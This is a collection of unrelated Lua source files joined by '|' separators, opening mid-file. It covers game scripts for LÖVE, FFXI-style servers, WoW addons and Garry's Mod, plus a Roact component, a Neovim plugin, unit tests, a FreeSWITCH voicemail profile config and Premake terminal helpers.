player:messageSpecial(ID.text.NOTHING_SEEMS_TO_HAPPEN)
end
end
end
function onTrigger(player,npc)
end
|
--[[
A version of Component with a `shouldUpdate` method that forces the
resulting component to be pure.
Exposed as Roact.PureComponent
]]
local Component = require(script.Parent.Component)
local PureComponent = Component:extend("PureComponent")
-- When extend()ing a component, you don't get an extend method.
-- This is to promote composition over inheritance.
PureComponent.extend = Component.extend
function PureComponent:shouldUpdate(newProps, newState)
if newState ~= self.state then
return true
end
if newProps == self.props then
return false
end
for key, value in pairs(newProps) do
if self.props[key] ~= value then
return true
end
end
for key, value in pairs(self.props) do
if newProps[key] ~= value then
return true
end
end
return false
end
return PureComponent |
ConfigStaticChests = {
-- {
-- x,
-- y,
-- z,
-- h, -- Heading
-- type, -- GLOBAL[0] | PUBLIC[1] | PRIVATE[2]
-- capacity, -- 0-∞
-- },
{
-3145.66,
1091.81,
20.69,
180.00,
0,
20
}
}
|
return {
NetworkingError = "NetworkingError",
QuickLaunchError = "QuickLaunchError",
PlayButtonError = "PlayButtonError",
PurchaseMessage = "PurchaseMessage",
GameFollowError = "GameFollowError",
SuccessConfirmation = "SuccessConfirmation",
InformationMessage = "InformationMessage",
} |
local identity = Device2.getIdentity(operation)
if identity.error then return identity end
local configIO = require("vendor.configIO")
if configIO then
identity.state.config_io = {
timestamp = require("c2c.utils").getTimestamp(configIO.timestamp),
set = configIO.config_io,
reported = configIO.config_io
}
end
return identity
|
print('XLUAAPP')
|
function love.load()
amount=255
music=love.audio.newSource('music/se/boss-intro.mp3')
music:play()
end
function love.update(dt)
amount=amount-255/amount
if amount<=0 then
loadState('boss/boss'..love.stage)
end
end
function love.draw()
love.graphics.setColor(amount,amount,amount)
love.graphics.rectangle('fill',0,0,love.graphics.getWidth(),love.graphics.getHeight())
end |
ModifyEvent(-2, -2, -1, -1, -1, -1, -1, 2492, 2492, 2492, -2, -2, -2);--by fanyu 打开宝箱,改变贴图 场景22-编号4
AddItem(17, 6);
AddItem(103, 10);
do return end;
|
local Canvas = require("gesture.view.canvas").Canvas
local windowlib = require("gesture.lib.window")
local M = {}
local Background = {}
Background.__index = Background
M.Background = Background
function Background.open(click)
vim.validate({click = {click, "function"}})
local width = vim.o.columns
local height = vim.o.lines - vim.o.cmdheight
local bufnr = vim.api.nvim_create_buf(false, true)
local window_id = vim.api.nvim_open_win(bufnr, true, {
width = width,
height = height,
relative = "editor",
row = 0,
col = 0,
external = false,
style = "minimal",
})
vim.wo[window_id].winblend = 100
vim.wo[window_id].scrolloff = 0
vim.wo[window_id].sidescrolloff = 0
local lines = vim.fn["repeat"]({(" "):rep(width)}, height)
vim.api.nvim_buf_set_lines(bufnr, 0, -1, false, lines)
vim.bo[bufnr].bufhidden = "wipe"
vim.bo[bufnr].filetype = "gesture"
vim.bo[bufnr].modifiable = false
local before_window_id = windowlib.by_pattern("^gesture://")
if before_window_id then
require("gesture.command").Command.new("cancel", before_window_id)
end
vim.api.nvim_buf_set_name(bufnr, ("gesture://%d/GESTURE"):format(bufnr))
-- NOTE: show and move cursor to the window by <LeftDrag>
vim.cmd("redraw")
click()
vim.cmd(([[autocmd WinLeave,TabLeave,BufLeave <buffer=%s> ++once lua require('gesture.command').Command.new("cancel", %s)]]):format(bufnr, window_id))
local ns = vim.api.nvim_create_namespace("gesture")
local tbl = {_window_id = window_id, _ns = ns, _canvas = Canvas.new(bufnr, ns)}
local self = setmetatable(tbl, Background)
vim.api.nvim_set_decoration_provider(self._ns, {
on_win = function(_, _, buf, topline)
if topline == 0 or buf ~= bufnr or not self:is_valid() then
return false
end
vim.fn.winrestview({topline = 0, leftcol = 0})
end,
})
return self, window_id
end
function Background.close(self)
windowlib.close(self._window_id)
vim.api.nvim_set_decoration_provider(self._ns, {})
end
function Background.is_valid(self)
return vim.api.nvim_win_is_valid(self._window_id)
end
function Background.draw(self, board, new_points)
self._canvas:draw(board, new_points)
end
return M
|
local gs = require 'vendor/gamestate'
local Splat = {}
Splat.__index = Splat
local splatters = love.graphics.newImage('images/splatters.png')
local splatterSize = {width=300,height=250}
local splattersAvail = splatters:getWidth() / splatterSize.width
local quads = {
love.graphics.newQuad(0, 0, splatterSize.width, splatterSize.height, splatters:getWidth(), splatters:getHeight()),
love.graphics.newQuad(splatterSize.width, 0, splatterSize.width, splatterSize.height, splatters:getWidth(), splatters:getHeight()),
love.graphics.newQuad(splatterSize.width * 2, 0, splatterSize.width, splatterSize.height, splatters:getWidth(), splatters:getHeight()),
}
Splat.splats = {}
function Splat.new(node)
Splat.node = {x=0, width=0}
return Splat
end
function Splat:setup_stencils()
-- get coords of the first ceiling and the first floor node
-- note: this will probably have to be refactored if we use hippies anywhere besides the hallway
self.ceiling = gs.currentState().map.objectgroups.ceiling.objects[1]
self.floor = gs.currentState().map.objectgroups.floor.objects[1]
self.map_width = gs.currentState().map.width * gs.currentState().map.tilewidth
self.stencils = {
ceiling = function()
love.graphics.rectangle('fill',
self.ceiling.x,
self.ceiling.y,
self.map_width,
self.ceiling.height )
end,
wall = function()
love.graphics.rectangle('fill',
self.ceiling.x,
self.ceiling.y + self.ceiling.height,
self.map_width,
self.floor.y - ( self.ceiling.y + self.ceiling.height ) )
end,
floor = function()
love.graphics.rectangle('fill',
self.floor.x,
self.floor.y,
self.map_width,
self.floor.height )
end
}
end
function Splat:enter()
for k,v in pairs(self.splats) do self.splats[k]=nil end
end
function Splat:add(x,y,width,height)
table.insert( self.splats, {
position = {
x = x,
y = y
},
width = width,
height = height,
index = math.random( splattersAvail ),
flipX = math.random( 2 ) == 1,
flipY = math.random( 2 ) == 1
} )
if not self.stencils then
self:setup_stencils()
return self
else
return false
end
end
function Splat:draw()
if self.stencils then
love.graphics.setColor( 255, 255, 255, 255 )
love.graphics.setStencil( self.stencils.wall )
for _,s in pairs( self.splats ) do
love.graphics.drawq( splatters,
quads[s.index],
( s.position.x + s.width / 2 ) - splatterSize.width / 2 + ( s.flipX and splatterSize.width or 0 ),
( s.position.y + s.height / 2 ) - splatterSize.height / 2 + ( s.flipY and splatterSize.height or 0 ),
0,
s.flipX and -1 or 1,
s.flipY and -1 or 1 )
end
love.graphics.setColor( 200, 200, 200, 255 ) -- Giving darker shade to splash on ceiling and floor
love.graphics.setStencil( self.stencils.floor )
for _,s in pairs( self.splats ) do
love.graphics.drawq( splatters,
quads[s.index],
( s.position.x + s.width / 2 ) - splatterSize.width / 2 + ( s.flipX and splatterSize.width or 0 ),
( s.position.y + s.height / 2 ) - splatterSize.height / 2 + ( s.flipY and splatterSize.height or 0 ),
0,
s.flipX and -1 or 1,
s.flipY and -1 or 1,
-splatterSize.width / 2 + ( s.flipY and 51 or 0 ), 0,
-1, 0 )
end
love.graphics.setStencil( self.stencils.ceiling )
for _,s in pairs( self.splats ) do
love.graphics.drawq( splatters,
quads[s.index],
( s.position.x + s.width / 2 ) - splatterSize.width / 2 + ( s.flipX and splatterSize.width or 0 ),
( s.position.y + s.height / 2 ) - splatterSize.height / 2 + ( s.flipY and splatterSize.height or 0 ),
0,
s.flipX and -1 or 1,
s.flipY and -1 or 1,
splatterSize.width / 2 - ( s.flipY and 51 or 0 ), 0,
1, 0 )
end
love.graphics.setColor( 255, 255, 255, 255 )
love.graphics.setStencil()
end
end
return Splat
|
local load = require 'loadClasses'
local room = require 'core/room'
local entity = require 'core/entity'
local log = require 'log'
local luaRoom = require 'core/luaRoomLoader'
load.loadClassesFromFile("entities/player.json")
local initRoom = luaRoom.fromFile('test.json')
entity.spawnRoot(initRoom)
local root = entity.getRoot()
--root:dump()
function love.draw()
root:fire("draw")
end
function love.update(dt)
root:fire("update", {dt})
end
function love.quit()
root:dump()
return
end
function love.keypressed(key ,scan, isrepeat)
if key == "escape" then
message = "Quit!"
love.event.quit()
end
if key == "p" then
root:dump()
end
end
|
require 'trace'
require 'Camera'
require 'Grapple'
require 'Common'
require 'Tool'
Player = {}
-- Utilities
local function getPlayerCoordinates()
return getCircleCoords(Player.Pos, Properties.PlayerRadius)
end
local function applyGravity()
applyForce( Player, {x = Properties.Gravity.x * Properties.PlayerMass, y = Properties.Gravity.y * Properties.PlayerMass})
end
local function toFreefall()
if Player.state == "freefall" then return end
Player.crawling = false
Player.sticking = false
Player.state = "freefall"
Player.collisions = nil
Player.Ov = nil
end
local function toCrawling()
if Player.state == "crawling" then return end
Player.crawling = true
Player.sticking = true
Player.state = "crawling"
clearImpulse(Player)
clearVel(Player)
end
local function toGrappling()
if Player.state == "grappling" then return end
toFreefall()
Player.state = "grappling"
end
local function updateState(targetState)
if targetState then
if targetState == "freefall" then
toFreefall()
elseif targetState == "crawling" then
toCrawling()
elseif targetState == "grappling" then
toGrappling()
end
elseif Player.Ov and not love.keyboard.isDown('down') then
toCrawling()
else
toFreefall()
end
end
-- Loading/saving
function Player:spawn(x, y, id)
Player.MoveControl = {x = 0, y = 0}
Player.AimControl = {y = 0}
Player.GrappleControl = 0
Player.SailControl = 0
Player.ToolControl = {use = 0, trigger = 0}
Player.Powered = false
Player.Aim = {x = 0, y = 0, angle = -math.pi/2, angularV = 0}
Player.GrapplePower = 0
Player.JumpPower = 0
Player.FacingRight = true
Player.state = "freefall"
Thing:addPlayerThing(Player,{x=x,y=y}, {x=0,y=0}, id)
Player.Pos.angle = 0
end
-- Drawing/updating
local function drawAim()
love.graphics.setColor(255,0,0,255)
local reticulex = Player.Pos.x + Player.Aim.x * Properties.AimDistance
local reticuley = Player.Pos.y + Player.Aim.y * Properties.AimDistance
local cx,cy = Camera:worldToScreen(reticulex,reticuley)
love.graphics.circle('line',cx,cy,Properties.AimDrawRadius,10)
end
local function drawMods()
if Player.SailControl > 0 then
love.graphics.setColor(50,100,255,100)
local cx,cy = Camera:worldToScreen(Player.Pos.x,Player.Pos.y)
love.graphics.circle('fill',cx,cy,Properties.SailGraphicFactor*Properties.PlayerRadius,10)
end
end
function Player:draw()
drawAim()
drawMods()
end
local function updateFreeFall(dt)
if Player.MoveControl.y < 0 then
Player.JumpPower = clamp01(Player.JumpPower + Properties.LaunchPowerRate * dt)
end
if Player.Pos.angle ~= math.pi / 2 then
if Player.Pos.angle >= -math.pi / 2 and Player.Pos.angle < math.pi / 2 then
Player.Pos.angle = math.min(Player.Pos.angle + Properties.PlayerFreefallRotationPeriod * dt, math.pi / 2)
elseif Player.Pos.angle < -math.pi / 2 then
Player.Pos.angle = rollangle(Player.Pos.angle - Properties.PlayerFreefallRotationPeriod * dt)
else -- angle must be between math.pi/2 and math.pi
Player.Pos.angle = math.max(Player.Pos.angle - Properties.PlayerFreefallRotationPeriod * dt, math.pi / 2)
end
end
end
local function updateAim(dt)
if Player.AimControl.y > 0 then
Player.Aim.angularV = clamp(-Properties.AimSpeedMax, Player.Aim.angularV - Properties.AimSpeedAccel * dt, Properties.AimSpeedMax)
elseif Player.AimControl.y < 0 then
Player.Aim.angularV = clamp(-Properties.AimSpeedMax, Player.Aim.angularV + Properties.AimSpeedAccel * dt, Properties.AimSpeedMax)
else
local negative = Player.Aim.angularV < 0
if negative then
Player.Aim.angularV = clamp(-Properties.AimSpeedMax,Player.Aim.angularV + Properties.AimSpeedSlow * dt,0)
else
Player.Aim.angularV = clamp(0,Player.Aim.angularV - Properties.AimSpeedSlow * dt,Properties.AimSpeedMax)
end
end
Player.Aim.angle = Player.Aim.angle + Player.Aim.angularV * dt
Player.Aim.angle = rollangle(Player.Aim.angle)
-- Move angle based on ground
local groundAngle = Player.Ov and toangle(0,0,Player.Ov.x,Player.Ov.y) or Player.Pos.angle
local currentAimAngle = (Player.FacingRight and Player.Aim.angle or -Player.Aim.angle) + groundAngle
Player.Aim.x, Player.Aim.y = math.cos(currentAimAngle), math.sin(currentAimAngle)
end
local function fireGrapple(imp)
print("Firing")
local grappleVel = {x = imp.x + Player.Vel.x, y = imp.y + Player.Vel.y}
Grapple:fire(Player.Pos,grappleVel, Player.Powered)
Player.GrapplePower = 0
updateState("grappling")
end
local function updateGrappleControl(dt)
if Player.GrappleControl > 0 then
Player.GrapplePower = clamp01(Player.GrapplePower + Properties.LaunchPowerRate * dt)
elseif Player.GrapplePower > 0 then
local imp = {x = Player.Aim.x * Properties.GrapplePower * Player.GrapplePower,
y = Player.Aim.y * Properties.GrapplePower * Player.GrapplePower}
fireGrapple(imp)
end
end
local function updateSailControl(dt)
if Player.SailControl > 0 then
Player.CrossSection = Player.Radius * Player.Radius * Properties.SailFactor
else
Player.CrossSection = Player.Radius * Player.Radius
end
end
local function updateCrawling(dt)
if Player.MoveControl.y < 0 then
Player.JumpPower = clamp01(Player.JumpPower + Properties.LaunchPowerRate * dt)
elseif Player.MoveControl.y > 0 then
updateState("freefall")
return
end
if Player.MoveControl.y == 0 and Player.JumpPower > 0 then
print('JUMP = '..tostring(Player.JumpPower))
local imp = {x = Player.Aim.x * Properties.JumpPower * Player.JumpPower * (Player.Powered and Properties.JumpPowerPowFactor or 1),
y = Player.Aim.y * Properties.JumpPower * Player.JumpPower * (Player.Powered and Properties.JumpPowerPowFactor or 1)}
applyImpulse(Player,imp)
Player.JumpPower = 0
updateState("freefall")
return
end
if Player.MoveControl.x ~= 0 then
Player.FacingRight = Player.MoveControl.x > 0
Player.Speed = Properties.PlayerCrawlSpeed * (Player.Powered and Properties.PlayerCrawlSpeedPowFactor or 1)
Player.crawling = true
else
Player.crawling = false
end
end
local function levelshift()
if Level:shift(Player.Pos.x,Player.Pos.y) then
Inventory:addTool(createRandomTool())
end
end
local function updateToolControl(dt)
Tool:updateControl(Inventory:getCurrentTool(), Player.ToolControl.use == 1, Player.ToolControl.trigger == 1, dt, Player.Aim, Player.Powered, Player.Pos, Player.Vel or {x=0, y=0})
end
function Player:update(dt)
if Player.state == "freefall" then
updateFreeFall(dt)
updateAim(dt)
updateGrappleControl(dt)
updateSailControl(dt)
updateToolControl(dt)
elseif Player.state == "crawling" then
updateCrawling(dt)
updateAim(dt)
updateGrappleControl(dt)
updateToolControl(dt)
elseif Player.state == "grappling" then
updateGrapple(dt)
updateSailControl(dt)
updateToolControl(dt)
end
levelshift()
updateState()
end
function Player:keypressed(key,isrepeat)
if key == Properties.Keybindings.right then
Player.MoveControl.x = 1
elseif key == Properties.Keybindings.left then
Player.MoveControl.x = -1
elseif key == Properties.Keybindings.jump then
Player.MoveControl.y = -1
elseif key == Properties.Keybindings.drop then
Player.MoveControl.y = 1
elseif key == Properties.Keybindings.aimup then
Player.AimControl.y = 1
elseif key == Properties.Keybindings.aimdown then
Player.AimControl.y = -1
elseif key == Properties.Keybindings.grapple then
Player.GrappleControl = 1
elseif key == Properties.Keybindings.sail then
Player.SailControl = 1
elseif key == Properties.Keybindings.power then
Player.Powered = not Player.Powered
elseif key == Properties.Keybindings.powerlock then
Player.Powered = not Player.Powered -- until next pressed
elseif key == Properties.Keybindings.nexttool then
Inventory:nextTool()
elseif key == Properties.Keybindings.prevtool then
Inventory:previousTool()
elseif key == Properties.Keybindings.usetool then
Player.ToolControl.use = 1
elseif key == Properties.Keybindings.triggertool then
Player.ToolControl.trigger = 1
elseif key == Properties.Keybindings.discardtool then
Inventory:discardtool()
end
end
function Player:keyreleased(key)
if key == Properties.Keybindings.left or key == Properties.Keybindings.right then
Player.MoveControl.x = 0
elseif key == Properties.Keybindings.jump or key == Properties.Keybindings.drop then
Player.MoveControl.y = 0
elseif key == Properties.Keybindings.aimup or key == Properties.Keybindings.aimdown then
Player.AimControl.y = 0
elseif key == Properties.Keybindings.grapple then
Player.GrappleControl = 0
elseif key == Properties.Keybindings.sail then
Player.SailControl = 0
elseif key == Properties.Keybindings.power then
Player.Powered = not Player.Powered
elseif key == Properties.Keybindings.powerlock then
-- do nothing
elseif key == Properties.Keybindings.usetool then
Player.ToolControl.use = 0
elseif key == Properties.Keybindings.triggertool then
Player.ToolControl.trigger = 0
elseif key == Properties.Keybindings.discardtool then
-- do nothing
end
end |
--[[
Profile configuration file. All variables put in here will be processed once
during the jester bootstrap.
If you have a variable foo that you want to have a value of "bar", do:
foo = "bar"
Array/record syntax is like this:
foo = { bar = "baz", bing = "bong" }
Variables from the main configuration may be used in values, by accessing
them through the global.<varname> namespace.
Channel variables may be used in values, by accessing them through the
variable("<varname>") function. Note that it's doubtful you'll have a
channel when connecting via the socket, so you probably shouldn't use this.
Storage variables may be used in values, by accessing them through the
storage("<varname>") function.
Initial arguments may be used in values, by accessing them through the
args(<argnum>) function.
]]
--[[
Everything in this section should not be edited unless you know what you are
doing!
]]
-- Overrides the global debug configuration for this profile only.
debug = true
-- Modules to load.
-- Overrides the global module configuration for this profile only.
-- Modules that primarily use the session object are not included. Some of
-- the included modules still have actions that use the session object, and
-- these actions should probably be avoided.
modules = {
"core_actions",
"data",
"email",
"event",
"file",
"format",
"log",
"navigation",
"tracker",
}
-- Overrides the global sequence path for this profile only.
sequence_path = global.profile_path .. "/socket/sequences"
-- Main directory that stores voicemail messages.
-- NOTE: This directory must already be created and writable by the FreeSWITCH
-- user.
voicemail_dir = global.base_dir .. "/storage/voicemail/default"
--[[
The sections below can be customized safely.
]]
--[[
Directory paths.
]]
-- The directory where recordings are stored temporarily while recording.
temp_dir = "/tmp"
--[[
ODBC database table configurations.
]]
-- Table that stores mailbox configurations.
db_config_mailbox = {
database_type = "mysql",
database = "jester",
table = "mailbox",
}
-- Table that stores messages.
db_config_message = {
database_type = "mysql",
database = "jester",
table = "message",
}
-- Table that stores messages.
db_config_message_group = {
database_type = "mysql",
database = "jester",
table = "message_group",
}
|
local luaunit = require 'luaunit'
local class = require 'pl.class'
local encoder = require 'krpc.encoder'
local platform = require 'krpc.platform'
local Types = require 'krpc.types'
local schema = require 'krpc.schema.KRPC'
local TestEncoder = class()
local types = Types()
function TestEncoder:test_encode_message()
local call = schema.ProcedureCall()
call.service = 'ServiceName'
call.procedure = 'ProcedureName'
data = encoder.encode(call, types:procedure_call_type())
expected = '0a0b536572766963654e616d65120d50726f6365647572654e616d65'
luaunit.assertEquals(platform.hexlify(data), expected)
end
function TestEncoder:test_encode_value()
local data = encoder.encode(300, types:uint32_type())
luaunit.assertEquals('ac02', platform.hexlify(data))
end
function TestEncoder:test_encode_unicode_string()
local data = encoder.encode('\226\132\162', types:string_type())
luaunit.assertEquals('03e284a2', platform.hexlify(data))
end
function TestEncoder:test_encode_message_with_size()
local call = schema.ProcedureCall()
call.service = 'ServiceName'
call.procedure = 'ProcedureName'
local data = encoder.encode_message_with_size(call, types:procedure_call_type())
local expected = '1c'..'0a0b536572766963654e616d65120d50726f6365647572654e616d65'
luaunit.assertEquals(expected, platform.hexlify(data))
end
function TestEncoder:test_encode_class()
local typ = types:class_type('ServiceName', 'ClassName')
local class_type = typ.lua_type
local value = class_type(300)
luaunit.assertEquals(300, value._object_id)
local data = encoder.encode(value, typ)
luaunit.assertEquals('ac02', platform.hexlify(data))
end
function TestEncoder:test_encode_class_none()
local typ = types:class_type('ServiceName', 'ClassName')
local value = nil
local data = encoder.encode(value, typ)
luaunit.assertEquals('00', platform.hexlify(data))
end
return TestEncoder
|
local AddonName, AddonTable = ...
-- Mogu'shan Vaults
AddonTable.mv = {
95618,
-- Shared
89768,
89767,
-- The Stone Guard
167047,
85922,
85923,
85924,
85925,
85926,
85975,
85976,
85977,
85978,
85979,
86134,
86739,
86740,
86741,
86742,
86743,
86744,
86745,
86746,
86747,
86748,
86793,
87012,
87013,
87014,
87015,
87016,
87017,
87018,
87019,
87020,
87021,
87060,
89766,
89929,
89930,
89931,
89964,
89965,
89966,
-- Feng the Accursed
85980,
85982,
85983,
85984,
85985,
85986,
85987,
85988,
85989,
85990,
86082,
86749,
86750,
86751,
86752,
86753,
86754,
86755,
86756,
86757,
86758,
86782,
87022,
87023,
87024,
87025,
87026,
87027,
87028,
87029,
87030,
87031,
87044,
89424,
89425,
89426,
89802,
89803,
89932,
89933,
89967,
89968,
-- Gara'jal the Spiritbinder
167048,
85991,
85992,
85993,
85994,
85995,
85996,
85997,
86027,
86038,
86039,
86040,
86041,
86759,
86760,
86761,
86762,
86763,
86764,
86765,
86766,
86767,
86768,
86769,
86770,
87032,
87033,
87034,
87035,
87036,
87037,
87038,
87039,
87040,
87041,
87042,
87043,
89817,
89934,
89969,
-- The Spirit Kings
86047,
86071,
86075,
86076,
86080,
86081,
86083,
86084,
86086,
86127,
86128,
86129,
86776,
86777,
86778,
86779,
86780,
86781,
86783,
86784,
86785,
86786,
86787,
86788,
87045,
87046,
87047,
87048,
87049,
87050,
87051,
87052,
87053,
87054,
87055,
87056,
89818,
89819,
89935,
89936,
89970,
89971,
-- Elegon
167049,
86130,
86131,
86132,
86133,
86135,
86136,
86137,
86138,
86139,
86140,
86141,
86789,
86790,
86791,
86792,
86794,
86795,
86796,
86797,
86798,
86799,
86800,
87057,
87058,
87059,
87061,
87062,
87063,
87064,
87065,
87066,
87067,
87068,
87777,
89821,
89822,
89824,
89937,
89938,
89939,
89972,
89973,
89974,
-- Will of the Emperor
138804,
167050,
86142,
86144,
86145,
86146,
86147,
86148,
86149,
86150,
86151,
86152,
86801,
86802,
86803,
86804,
86805,
86806,
86807,
86808,
86809,
86810,
87069,
87070,
87071,
87072,
87073,
87074,
87075,
87076,
87077,
87078,
87825,
87826,
87827,
89820,
89823,
89825,
89940,
89941,
89942,
89975,
89976,
89977,
}
|
return {
fields = {
allowed_number_query_args = { default = 100, type = "number" },
allowed_number_post_args = { default = 100, type = "number" },
}
}
|
local PLAYER = FindMetaTable("Player")
function PLAYER:IsPolice()
return self:Team() == FACTION_POLICE
end
|
describe('take', function()
it('produces an error if its parent errors', function()
local observable = Rx.Observable.of(''):map(function(x) return x() end)
expect(observable).to.produce.error()
expect(observable:take(1)).to.produce.error()
end)
it('produces nothing if the count is zero', function()
local observable = Rx.Observable.of(3):take(0)
expect(observable).to.produce.nothing()
end)
it('produces nothing if the count is less than zero', function()
local observable = Rx.Observable.of(3):take(-3)
expect(observable).to.produce.nothing()
end)
it('takes one element if no count is specified', function()
local observable = Rx.Observable.fromTable({2, 3, 4}, ipairs):take()
expect(observable).to.produce(2)
end)
it('produces all values if it takes all of the values of the original', function()
local observable = Rx.Observable.fromTable({1, 2}, ipairs):take(2)
expect(observable).to.produce(1, 2)
end)
it('completes and does not fail if it takes more values than were produced', function()
local observable = Rx.Observable.of(3):take(5)
local onNext, onError, onCompleted = observableSpy(observable)
expect(onNext).to.equal({{3}})
expect(#onError).to.equal(0)
expect(#onCompleted).to.equal(1)
end)
it('unsubscribes when it completes', function ()
local keepGoing = true
local unsub = spy()
local observer
local source = Rx.Observable.create(function (_observer)
observer = _observer
return Rx.Subscription.create(unsub)
end)
source
:take(1)
:subscribe(Rx.Observer.create())
expect(#unsub).to.equal(0)
observer:onNext()
expect(#unsub).to.equal(1)
end)
end)
|
---------------------------------------------------------------------------------------------------
-- func: hastitle
-- desc: Check if player already has a title.
---------------------------------------------------------------------------------------------------
require("scripts/globals/titles");
cmdprops =
{
permission = 1,
parameters = "ss"
};
function error(player, msg)
player:PrintToPlayer(msg);
player:PrintToPlayer("!hastitle <title ID> {player}");
end;
function onTrigger(player, titleId, target)
-- validate titleId
if (titleId == nil) then
error(player, "You must supply a title ID.");
return;
end
titleId = tonumber(titleId) or tpz.title[string.upper(titleId)];
if (titleId == nil or titleId < 1) then
error(player, "Invalid title ID.");
return;
end
-- validate target
local targ;
if (target == nil) then
targ = player;
else
targ = GetPlayerByName(target);
if (targ == nil) then
error(player, string.format("Player named '%s' not found!", target));
return;
end
end
if (targ:hasTitle(titleId)) then
player:PrintToPlayer(string.format("%s has title %s.", targ:getName(), titleId));
else
player:PrintToPlayer(string.format("%s does not have title %s.", targ:getName(), titleId));
end
end
|
--
-- term.lua
-- Additions to the 'term' namespace.
-- Copyright (c) 2017 Blizzard Entertainment and the Premake project
--
-- default colors.
term.black = 0
term.blue = 1
term.green = 2
term.cyan = 3
term.red = 4
term.purple = 5
term.brown = 6
term.lightGray = 7
term.gray = 8
term.lightBlue = 9
term.lightGreen = 10
term.lightCyan = 11
term.lightRed = 12
term.magenta = 13
term.yellow = 14
term.white = 15
-- colors for specific purpose.
term.warningColor = term.magenta
term.errorColor = term.lightRed
-- color stack implementation.
term._colorStack = {}
function term.pushColor(color)
local old = term.getTextColor()
table.insert(term._colorStack, old)
term.setTextColor(color)
end
function term.popColor()
if #term._colorStack > 0 then
local color = table.remove(term._colorStack)
term.setTextColor(color)
end
end
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.